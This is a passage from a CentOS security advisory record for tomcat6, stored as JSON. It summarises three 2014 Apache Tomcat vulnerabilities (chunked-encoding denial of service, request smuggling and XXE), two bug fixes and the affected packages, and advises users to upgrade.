technologies.\n\nIt was discovered that Apache Tomcat did not limit the length of chunk\nsizes when using chunked transfer encoding. 
A remote attacker could use\nthis flaw to perform a denial of service attack against Tomcat by streaming\nan unlimited quantity of data, leading to excessive consumption of server\nresources. (CVE-2014-0075)\n\nIt was found that Apache Tomcat did not check for overflowing values when\nparsing request content length headers. A remote attacker could use this\nflaw to perform an HTTP request smuggling attack on a Tomcat server located\nbehind a reverse proxy that processed the content length header correctly.\n(CVE-2014-0099)\n\nIt was found that the org.apache.catalina.servlets.DefaultServlet\nimplementation in Apache Tomcat allowed the definition of XML External\nEntities (XXEs) in provided XSLTs. A malicious application could use this\nto circumvent intended security restrictions to disclose sensitive\ninformation. (CVE-2014-0096)\n\nThe CVE-2014-0075 issue was discovered by David Jorm of Red Hat Product\nSecurity.\n\nThis update also fixes the following bugs:\n\n* The patch that resolved the CVE-2014-0050 issue contained redundant code.\nThis update removes the redundant code. (BZ#1094528)\n\n* The patch that resolved the CVE-2013-4322 issue contained an invalid\ncheck that triggered a java.io.EOFException while reading trailer headers\nfor chunked requests. This update fixes the check and the aforementioned\nexception is no longer triggered in the described scenario. (BZ#1095602)\n\nAll Tomcat 6 users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. 
Tomcat must be\nrestarted for this update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2014-July/032441.html\n\n**Affected packages:**\ntomcat6\ntomcat6-admin-webapps\ntomcat6-docs-webapp\ntomcat6-el-2.1-api\ntomcat6-javadoc\ntomcat6-jsp-2.1-api\ntomcat6-lib\ntomcat6-servlet-2.5-api\ntomcat6-webapps\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2014-0865.html", "edition": 3, "modified": "2014-07-09T16:09:49", "published": "2014-07-09T16:09:49", "href": "http://lists.centos.org/pipermail/centos-announce/2014-July/032441.html", "id": "CESA-2014:0865", "title": "tomcat6 security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}